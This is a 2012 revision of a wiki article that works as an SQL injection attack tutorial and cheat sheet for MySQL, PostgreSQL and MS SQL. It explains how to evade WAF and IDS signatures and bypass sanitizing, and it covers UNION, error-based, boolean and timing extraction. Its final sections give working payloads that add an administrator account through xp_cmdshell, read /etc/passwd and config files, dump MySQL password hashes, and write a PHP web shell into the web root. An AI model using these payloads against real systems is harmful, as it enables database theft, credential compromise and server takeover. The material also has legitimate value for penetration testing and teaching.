Revision as of 18:48, 19 November 2012

SQL injection is a method of exploiting web applications performed over http or https to compromise the underlying database engine supporting dynamic content for the web application itself. Successful exploitation of an SQL injection vulnerability can result in the attacker gaining unfettered access to the database and can lead to further privilege escalation.

Typically, databases include things like (but not limited to):

• Authentication credentials
• Other identifying information about a user (like an IP address)
• Site configurations
• Site content and themes
• Communications between users within the site

Bypassing modern SQL injection security measures

Simply triggering an IPS or WAF and having the request blocked under only certain conditions does not confirm the vulnerability of the page.

To exploit or even test web applications in the modern world, countermeasures that are in place would need to be recognized and defeated. A WAF is probably in the way if the following things are being experienced:

• Having the connection to the server reset ONLY when testing the site for vulnerabilities
• 403 Forbidden responses ONLY when testing the site for vulnerabilities
• Being blocked by the remote firewall after a repeatable number of injection attempts

Many IDS and WAF systems can be easily evaded by either:

• Simply using SSL or HTTPS
• Using a de-syncronization attack like session-splicing when SSL is not an option.

Basic signature evasion

Signature evasion is very similar to evading partial sanitizing. Instead of modifying the characters, an IPS drops traffic if the characters appear in a particular sequence in order to match a pattern. By discovering that sequence, adjustments can be made to the queries to evade the IPS or WAF in the way of the testing. Many web application firewalls will recognize the "1=1" test simply due to its popularity. Other queries that are very similar may also be noticed. Lets suppose the signature is looking for something along the lines of [integer][equal sign][integer], or that a request with "AND 1=1" had its connection reset, but the page without the injection continues to load.

Whitespace placement

Take note of the whitespace around the = operator. If there is none, try adding a space. If there is a space on each side, try removing or adding one to see if there isn't a proper length delimiter on the signature. Lopsided, missing, or extra whitespace may be found that can bypass signature-based analysis engines.

 %20and%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%201=%20%20%20%201 (TRUE)
 %20and%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%201=%20%20%20%200 (FALSE)

Integer and string size delimiters

Because there is usually a size delimiter or a maximum size to the integer, the size to stop detection can be exceeded. Ten digit random numbers, instead of the single digit predictable numbers might do the trick.

 %20and%402837649781237849=402837649781237849 (TRUE)
 %20and%201789236419872364=128756128398671289 (FALSE)

Switching up the data types

If integers are proving a hard time, the signature may be tuned too specifically to integers. Try mixing the comparisons up a bit, using strings or floating point values to de-rail the signature.

 %20and%205.8=5.8      (TRUE)
 %20and%200.2=0.3      (FALSE)

Arithmetic tests

Instead of comparing a value like "1=1", compare mathematical expressions. Mathematical expressions may be the key to bypassing the problem if there are still problems with signature detection.

 %20and%201.2+3=4.2    (TRUE)
 %20and%200.2-1=0      (FALSE)

Capitalization

If there are still problems during testing, this probably isn't the issue. Try changing the case of the letters making up the boolean operator (and to AnD and or to oR).

Extending conditional statements

Many IDS signatures will look for a boolean operator ("and" or "or") before a conditional statement if it is being appended to another conditional statement (e.g. after query reconstruction we have where id=1 and 1=1, there are two conditions there).

• Using IF for MySQL injection:

The syntax for the IF statement in MySQL is:

IF([condition],[VALUE TO RETURN IF TRUE],[ELSE RETURN VALUE])

 %20and%20if(10829361=10829361,1,0)  (TRUE)
 %20and%20if(98276232=72619126,1,0)  (FALSE)

Any combination of the above techniques can be used in conjunction with one another as long as the queries still return true and false.

Defeating partial sanitizing

If an attempt is made to bypass the sanitizing by breaking the sanitizing method, there will most likely be trouble. Instead, bypass the sanitizing by crafting queries that do not require sanitized characters.

Quotes

MySQL and certain versions of Microsoft SQL allow for string literals to be passed in hexadecimal format.:

 select 'abc';
 ...is equivalent to...
 select 0x616263;.
 Additionally, PostgreSQL allows the use of two dollar signs as string delimiters
 select $$abc$$;

Therefore, 0x616263 can be used in place of 'abc'. This will come in handy while exploiting a WHERE clause and not being able to use quotes.}}

String concatenation can avoid the use of quotes the use of quotes in:

• MySQL:

 Using the char() function to construct the string 'abc':
 select char(97,98,99);
 ->Similar to the hex example, char(97,98,99) can be used interchangeably with the string 'abc'.

• PostgreSQL:

 Using the chr() function and double-pipe concatenation operator:
 select chr(97)||chr(98)||chr(99);
 ->Similar to the above example, chr(97)||chr(98)||chr(99) can be used interchangeably with the string 'abc'.

• Microsoft SQL Server:

 Using the char() function and plus operator:
 select char(97)+char(98)+char(99);
 ->Similar to the other examples, char(97)+char(98)+char(99) can be used interchangeably with the string 'abc'.

Whitespace filtering

Filtering can be bypassed on the space character by using alternative whitespace characters to the space character (%20). Most SQL engines consider a line return (%0a in a *NIX environment, %0a%0d in a Windows environment), tab characters, or the + character as valid whitespace:

 and%0a1=1
 and%0a1=0
 and+1=1
 and+1=0

MySQL treats block comments as whitespace.

AND/*comment1*/1/*comment2*/=/*comment3*/1
AND/*comment1*/1/*comment2*/=/*comment3*/0

Bypassing XSS filters during SQL injection

If XSS filtering is encountered, chances are the standard comparison operators (=, <,>) are being filtered out. If this is the case, 'alternative comparison operators will need to be used':

Testing with BETWEEN

The between operator is universal across all SQL platforms with the same syntax, and as a result is a more reliable testing method.

• The between comparison operator will return true or false based on whether or not the preceding value is between a ceiling and a floor in a range. For example, 50 is between 0 and 100, but 300 is not, which safely avoids using the = operator in the query:

 and%2050%20between%200%20and%20100   (True)
 and%20300%20between%200%20and%20100  (False)

• This turns the query into something like:

 select * from articles where id=1 and 50 between 0 and 100
 select * from articles where id=1 and 300 between 0 and 100

The between operator can also be used on strings:

 and%20'c'%20between%20'a'%20and%20'm (True)
 and%20'z'%20between%20'a'%20and%20'm (False)

Testing with Regular Expression Operators (REGEXP, ~, and RLIKE)

• Different database engines have different operators for Regular Expressions:

MySQL uses the REGEXP operator.

PostgreSQL uses the ~ operator.

MS SQL uses the RLIKE operator.

Regular expressions are the most evasive method for remote SQL injection possible, as they lack many of the common syntax characters necessary for other forms of injection.

The following tests contruct strings using native string constructors to bypass any requirement for quotes. For more information regarding this, please see the entry on sql injection without quotes.

AND 0x2e REGEXP 0x2e

AND 0x6a REGEXP 0x7a

AND chr(97) ~ chr(97)

AND chr(98) ~ chr(99)

AND CHAR(97) RLIKE CHAR(97)

AND CHAR(104) RLIKE CHAR(64)

Intermediate SQL injection

There are various methods for exploiting various databasing engines, including MySQL, PostgreSQL and Microsoft SQL server. Different engines may require different function names, environment variables, or syntax nuances for proper effectiveness.

Example testing is not included for UPDATE or INSERT queries using subqueries. In those cases, it is best to escape the argument, use a comma delimiter, and testing using integers until the right number of columns is found. Then substitute column values for insert and delete using subqueries that return a single cell rather than a single byte, similar to single-byte exfiltration

Automation theory

The most important thing when automating SQL injection is recognizing boundaries.

 
SELECT LENGTH(USER())
SELECT CHAR_LENGTH(USER())
SELECT len(USER())

 
SELECT COUNT(column_name) FROM information_schema.columns WHERE TABLE_NAME=[TABLE_NAME] AND table_schema=[DATABASE]
 

SELECT column_type FROM information_schema.columns WHERE TABLE_NAME=[TABLE_NAME] AND column_name=[column_name] AND table_schema=[DATABASE]

Sometimes integer values won't be able to be selected when using error-based injection. There's more than one way to solve this.

 
    $stop_value  = "select id from table order by id desc limit 1 offset 0";
    $start_query = "select id from table order by id asc limit 1 offset 0";
 

 
    $loop_query = "select id from table order by id asc limit 1 offset $counter";
 

Here are a few variables to be aware of while writing automated exploit software.

Basic Injection : Union Select

• The UNION operator allows collection of the output of two SELECT statments with UNION ALL SELECT or UNION SELECT so long as the results have the

same number of columns:

SELECT COLUMN FROM TABLE UNION ALL SELECT COLUMN

Determining the number of columns

The number of columns can be determined using ORDER BY injection and incrementing a field index, for example:

 /article.php?id=1 ORDER BY 1 asc
 /article.php?id=1 ORDER BY 2 asc

Extracting data

If the number of columns is known in a table (for example, by using the ORDER BY injection technique), the following injection can be used assuming that there are 2 columns:

 /article.php?id=5 UNION ALL SELECT 1,2/*

SELECT * FROM ARTICLES WHERE id=5 UNION ALL SELECT 1,2/*

 /article.php?id=-1 UNION ALL SELECT 1,version()/*

 /article.php?id=-1 UNION ALL SELECT 1,table_name from information_schema.tables where table_schema=database() limit 1/*

 /article.php?id=-1 UNION ALL SELECT 1,group_concat(table_name,0x2e,column_name) from information_schema.columns where table_schema=database()/*

 table1.column1, table1.column2, table2.column1

Intermediate testing: "SELECT" ... LIMIT clause injections

 /view_results.php?start=30&perpage=10

A LIMIT clause may have two different inputs, one being the number of rows to return, the other being what row to start from when selecting the rows. On recent versions of MySQL the limit clause syntax is congruent to PostgreSQL syntax: LIMIT $perpage OFFSET $start

On older versions of MySQL, the offset operator was not supported. In those cases the older syntax will be used: LIMIT $start,$perpage

• Because the input is located at either $start or $perpage in a LIMIT clause, it can be deduced that:

 UNION SELECT is the only available method for successful exploitation.
 The rest of the query will have to be commented out for successful exploitation.

• In order to access UNION SELECT if there are data limitations:

 The LIMIT clause must be given an impossible starting offset so that no data will be displayed,
 making room for data returned by the UNION SELECT.  The offset will have to be a larger number
 than the number of rows returned by the query.

Intermediate injection: information retrieval via verbose errors

This technique relies on the following database and application characteristics:

• Sometimes databases display errors containing selected data even though union select is not an option.
• Sometimes the application will display SQL errors on the page.

When a web application displays its SQL errors, there's a few things that can be done to make errors display data along with them. In each of the examples below, the @@database variable or current_database()/database() functions return what can be seen for error output. These can be replaced with any subquery'd select statement that returns a single cell.

 
 AND 1=CONVERT(INT,@@DATABASE)--

 

 AND 1=2 OR ROW(1,1) > (SELECT COUNT(*),concat(DATABASE(),0x3a,FLOOR(rand()*2) ) x FROM (SELECT 1 UNION SELECT 2) a GROUP BY x LIMIT 0,1)

 AND 3=5 OR (SELECT CAST(current_database() AS NUMERIC)) = (SELECT CURRENT_USER())

Advanced: manual boolean enumeration

Boolean enumeration is the process of using conditional statements (true and false, just like the testing methodology) to determine the value of a byte.

 BETWEEN ... AND ...    |   Operator
 = < >                  |   Operators
 substring()            |   Function
 ascii()                |   Function

Using Ascii codes and the ascii() function for enumeration

The ascii() function on any given database engine will return the ascii code for the the character passed to it. If it is passed an entire string, it will return the ascii code for the first character. For example:

 SELECT ascii('a');
  +------------+
  | ascii('a') |
  +------------+
  |         97 |
  +------------+
  1 ROW IN SET (0.00 sec)

substring()

Using substring() to select a single byte:

• The substring() syntax is:

SUBSTRING([STRING],[POSITION],[LEN])

• To select the first character of a string, for example:

 SELECT SUBSTRING('abc',1,1);
  +----------------------+
  | SUBSTRING('abc',1,1) |
  +----------------------+
  | a                    |
  +----------------------+
  1 ROW IN SET (0.00 sec)
 

• To select the second character:

 SELECT SUBSTRING('abc',2,1);
  +----------------------+
  | SUBSTRING('abc',2,1) |
  +----------------------+
  | b                    |
  +----------------------+
  1 ROW IN SET (0.01 sec)
 

Version fingerprinting with ascii-based enumeration

 While boolean enumeration can be used to obtain any type of data, version fingerprinting will be used as the example.

In theory

For the examples, version() function will be used.

• The ascii code of the first character of the version string can be accessed by calling:

 ascii(substring(lower(version()),1,1))

• On PostgreSQL, the first character of version() is 'P'. Since converting it to lowercase, the ascii value of 'p' is 112.

  postgres=# SELECT ascii(SUBSTRING(LOWER(version()),1,1));
   ascii 
  -------
     112
  (1 ROW)

• On MySQL, the first character of version() is numeric. On the local example, the first character is '5'.

 mysql> SELECT ascii(SUBSTRING(LOWER(version()),1,1));
  +----------------------------------------+
  | ascii(SUBSTRING(LOWER(version()),1,1)) |
  +----------------------------------------+
  |                                     53 |
  +----------------------------------------+
  1 ROW IN SET (0.00 sec)

In Practice

These queries work on MS SQL as well, an MS SQL server was not available during the writing of this article for demonstration. The same syntax, except using the @@version environment variable applies.

 /vulnerable.ext?id=1 and ascii(substring(lower(version()),1,1)) between 0 and 127
 /vulnerable.ext?id=1 and ascii(substring(lower(version()),1,1)) between 128 and 255

SELECT * FROM sample WHERE id=1 AND ascii(SUBSTRING(LOWER(version()),1,1)) BETWEEN 53 AND 53;
  +----+---------------------+
  | id | sample_text         |
  +----+---------------------+
  |  1 | this IS sample text |
  +----+---------------------+
  1 ROW IN SET (0.01 sec)

     ascii(SUBSTRING(LOWER(version()),1,1))

     ascii(SUBSTRING(LOWER(version()),2,1))

Using Regular Expressions for Boolean enumeration

Regular expressions is by far the best solution to filtering and sanitizing.

Getting started with regular expressions

Regexp allows comparative analysis of a single byte from a string with a list, similar to between ... and ... injection.

 ^   The beginning of a string
 $   End of a string
 .   Any character
 *   0 or more of the preceeding character
 +   1 or more of the preceeding character
 ?   0 or 1 of the preceeding character

  Pattern | Description
  [a-z]   | Matches only letters a through z
  [0-9]   | Matches only numbers
 [aeiouy] | Matches vowels.
 ^a[0-9]  | Matches if the first character of the string is `a', only if the second character of the string is a number.

Version fingerprinting using compatible regular expressions

 MS SQL and MySQL now both have the RLIKE regular expression operator.

  AND version() RLIKE '^[0-4]'        -- This will match if the first character of the version is between 0 and 4
  AND version() RLIKE '^[5-9]'        -- This will match if the first character of the version is between 5 and 9

  AND LOWER(version()) ~ '^[a-z]'   -- Should ALWAYS return true
  AND UPPER(version()) ~ '^[a-z]'   -- Should NEVER return true

• Adjust the ranges to hone in on the value of the byte.

Expert: Timing attacks for automated boolean enumeration

Timing attacks generally fall under two categories:

MySQL boolean timing attacks

Mysql's primary functions that can time delay are sleep() and benchmark(). Benchmark() is actually a benchmark utility and executes a given query a number of times based on a BIGINT argument, whereas sleep() is a single query.

benchmark() and related issues

Benchmark() may betray the activities

Evasive sleep() based boolean enumeration with regular expressions

Some information about the environment:

 
  mysql> SELECT version();
  +-----------------+
  | version()       |
  +-----------------+
  | 5.1.58-log      |
  +-----------------+
  1 ROW IN SET (0.00 sec)

 
  mysql> SELECT * FROM sample WHERE id=1;
  +----+---------------------+
  | id | sample_text         |
  +----+---------------------+
  |  1 | this IS sample text |
  +----+---------------------+
  1 ROW IN SET (0.00 sec)

Testing for the ability to sleep():

It is very simple to test for access to the sleep() function:

 %20and%20sleep(15)

  mysql> SELECT * FROM sample WHERE id=1 AND sleep(15);

 Empty set (15.00 sec)

  mysql> SELECT * FROM sample WHERE id=1 AND sleep(CAST((SELECT 'a' REGEXP '^[n-z]') AS signed) * 15);

 Empty set (0.00 sec)

  mysql> SELECT * FROM sample WHERE id=1 AND sleep(CAST((SELECT 'x' REGEXP '^[n-z]') AS signed) * 15);

 Empty set (15.00 sec)

Using sleep() to map a table name with regular expressions

  mysql> SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 offset 0;
  +------------+
  | TABLE_NAME |
  +------------+
  | sample     |
  +------------+
  1 ROW IN SET (0.00 sec)

  mysql> SELECT * FROM sample WHERE id=1 AND sleep((SELECT CAST(
           (SELECT (SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 offset 0) REGEXP '^[a-m]')
         AS signed) * 15));

  mysql> SELECT * FROM sample WHERE id=1 AND sleep((SELECT CAST(
           (SELECT (SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 offset 0) REGEXP '^[n-z]')
         AS signed) * 15));

PostgreSQL Boolean Timing Attacks

 pg_sleep() is the basis of both single-byte exfiltration and boolean enumeration.

Testing for access to pg_sleep()

Testing for access to pg_sleep() occurs with:

   AND pg_sleep(15) IS NULL

Using pg_sleep() with alternative comparisons for evasive boolean enumeration

BETWEEN ... AND ... can be used as well as the regular expression operators here.

Sleeping on true and not sleeping on false:'Similar to mysql, the database will sleep when pg_sleep([int]) is selected .'

• Using CASE to control pg_sleep with BETWEEN...AND:

   AND (CASE WHEN 1 BETWEEN 1 AND 1 THEN pg_sleep(15) ELSE 9 END) IS NULL

• If the input is vulnerable, the database will sleep for 15 seconds.
• True statements will sleep, false statements will not sleep.

ascii() can be used between similar to standard PostgreSQL Boolean Enumeration here,

• True Injection:

   AND (CASE WHEN ascii(SUBSTRING(version(),1,1)) BETWEEN 1 AND 255 THEN pg_sleep(5) ELSE 98923 END) IS NULL

• False Injection:

   AND (CASE WHEN ascii(SUBSTRING(version(),1,1)) BETWEEN 1 AND 1 THEN pg_sleep(5) ELSE 23265 END) IS NULL

Using CASE with the ~ regular expression operator and string concatenation: Notice that like MySQL regular expression attacks, this attack also bypasses the need for several syntax characters.

  (SELECT chr(94)||chr(91)||chr(97)||chr(45)||chr(122)||chr(93))

• This should always be true, delaying the page load for an additional 15 seconds:

   AND (CASE WHEN LOWER(version()) ~ (SELECT chr(94)||chr(91)||chr(97)||chr(45)||chr(122)||chr(93)) THEN pg_sleep(15) ELSE NULL END) IS NULL

• This should always be false, as PostgreSQL always capitalizes the first character, meaning no time delay should take place:

   AND (CASE WHEN version() ~ (SELECT chr(94)||chr(91)||chr(97)||chr(45)||chr(122)||chr(93)) THEN pg_sleep(15) ELSE NULL END) IS NULL

Expert: Automated Single-byte exfiltration

There are multiple types of single byte exfiltration attacks:

• Timing based
• Pre-computation based

The only three things that all of these methods have in common is:

• These attacks are all limited in some fashion because of local environment and latency or remote environment and dataset.
• The target environment must not filter or otherwise restrict the use of commas (,); regular expressions will not work here because injected queries are selecting rather than comparing the value of a single byte.
• You must not be afraid of programming.

Timing-based single-byte exfiltration

If not on a LAN when this technique is utilized, buggy and unpredictable results will be attained.

This testing is ideal when:

• It is taking place on a relatively low latency network
• There is access to a consistent latency and the remote page has a consistent load time (may not vary by more than 0.5 seconds)

Single byte exfiltration takes less queries to perform the same results, and leaves a smaller log footprint.

• A timer will need to be used to see how long it takes the remote server to serve the page.

Examples of timing-based single-byte exfiltration:

• Exfiltrating the first character of the database name in a single request:

 
  AND sleep(ascii(SUBSTRING(@@DATABASE,1,1)))                  -- MySQL
  AND pg_sleep(ascii(SUBSTRING(current_database,1,1))) IS NULL -- PostgreSQL
 

By timing these (in seconds) the integer value of the ascii code of the first character of the database will be attained.

The comparative precomputation attack

This attack relies heavily on the remote dataset for successful exploitation and is thus less reliable than other methods. This significantly differs from previously discovered single-byte exfiltration techniques because:

  $query = "select * from articles where id=$input"; 

 /articles.php?id=1

 /articles.php?id=255 Follow the next steps for automation (and sanity's) sake:

 /articles.php?id=ascii(substr(user(),1,1))

  $ascii_code = $checksums[$output_checksum]; 

Further penetration

Most demonstrated methods require additional privileges

Obtaining direct database access

There are several methods for obtaining direct database access so that log in can occur remotely.

• See the Privileged query cheat sheets for queries to directly obtain database credentials using SQL injection
• Obtaining authentication credentials from the web application configuration file by accessing the filesystem

  SELECT load_file('/path/to/config.php');

• After escalating privileges to administrator of the web application using its administrative interface to run queries directly find the authentication credentials in the configuration file with a file editor

Obtaining authentication credentials from the web application's configuration file using code-execution after privilege escalation

Obtaining filesystem access

This will require MySQL, depend on the SQL server configuration as well as the OS configuration, the user in context must have the FILE privilege.

Examples of these are located in the priveleged MySQL cheat sheet.

Obtaining code execution

• Through the vulnerable web application:

It is possible that the administrative interface will contain template and theme editors and the ability to add/modify/delete PHP or other interpreted languages in the associated files. Knowing this is just one more reason to make a beeline for the user table for the affected web application and get to cracking the authentication credentials for the admin user.

• Via database engine (MS SQL-specific)

By ending the query with a semicolon or comment delimiter and beginning a new query, we can get MS SQL to run

;exec master..xp_cmdshell 'net user hacker hacker_password /add'
;exec master..xp_cmdshell 'net localgroup administrators hacker /add'
/url.asp?ArticleID=1;exec master..xp_cmdshell 'net user hacker hackerpassword /add';--
/url.asp?ArticleID=1;exec master..xp_cmdshell 'net localgroup administrators hacker /add';--

• Writing a shell to the document root (MySQL-specific)

Cheat Sheets

Vulnerability testing

Universal true and false statements

• Standard operators (Universal):

AND 230984752 = 230984752

AND 1023947182234 = 4382616621386497

• The Between ... And ... operators (Universal):

AND 238829 BETWEEN 238826 AND 238927

AND 328961 BETWEEN 928172 AND 986731

• The LIKE operator (Universal):

AND 'sqltest' LIKE 'sql%'

AND 'sqltest' LIKE 'not true'

• The REGEXP operator (RLIKE in Microsoft SQL and the "~" character in PostgreSQL, Universal):

AND 'sqltest' REGEXP '^sql'

AND 'sqltest' REGEXP '^false'

MySQL syntax reference

• Comment notation:

 /*   [*/]
 %23 (# urlencoded) 
 --[space]

• Handy functions, statements, and Environment Variables:

  version()
  USER()
  current_database()
  COUNT([column_name]) FROM [TABLE_NAME]
  LENGTH([column_name]) FROM [TABLE_NAME] [WHERE OR LIMIT]
  substr([query],[byte_counter],1) 
  concat([column_name],0x2f,[column_name]) FROM [TABLE_NAME] [WHERE OR LIMIT]
  group_concat([column_name],0x2f,[column_name]) FROM [TABLE_NAME] [WHERE OR LIMIT]

• The need for quotes can be evaded by using the 0x[hex] operator. An example is "select 0x6a6a". The output is "jj", same as if "select 'jj'" is run.

Mysql versions >= 5 user schema mapping (unprivileged)

• Show Databases Equivilent:

 SELECT schema_name FROM information_schema.schemata LIMIT 1 offset 0

• Show Tables Equivilent

 SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 offset 0

• Show Fields Equivilent

SELECT column_name FROM information_schema.columns WHERE table_schema=DATABASE() AND TABLE_NAME=([TABLE query]) LIMIT 1 offset 0

Privileged MySQL (any version) user

• Get mysql usernames and password hashes:

 SELECT concat(USER,0x2f,password) FROM mysql.user LIMIT 1

• Grab /etc/passwd

SELECT load_file(0x2f6574632f706173737764)

• Dump a small php shell (<?php system($_GET['id']); ?>) into /var/www/localhost/htdocs

 SELECT 0x3c3f7068702073797374656d28245f4745545b276964275d293b203f3e INTO OUTFILE '/var/www/localhost/htdocs/.shell.php'

PostgreSQL syntax reference

Handy functions & Environment Variables include:

 
  current_database()
  CURRENT_USER()
  chr()
  ascii()
  substr()

Quick and common string concatenations:

String concatenation in postgresql is done using the two pipe operators side by side, e.g. "select chr(97)||chr(97)" is the same as "select 'aa'".

PostgreSQL schema mapping

  SELECT schema_name FROM information_schema.schemata WHERE catalog_name=current_database() LIMIT 1 offset 0

  SELECT TABLE_NAME FROM information_schema.tables table_type='BASE TABLE' AND table_schema=([schema_query]) AND catalog_name=current_database() LIMIT 1 offset 0

  SELECT column_name FROM information_schema.columns WHERE TABLE_NAME=([table_query]) AND table_schema=(schema_query) AND catalog_name=current_database() LIMIT 1 offset 0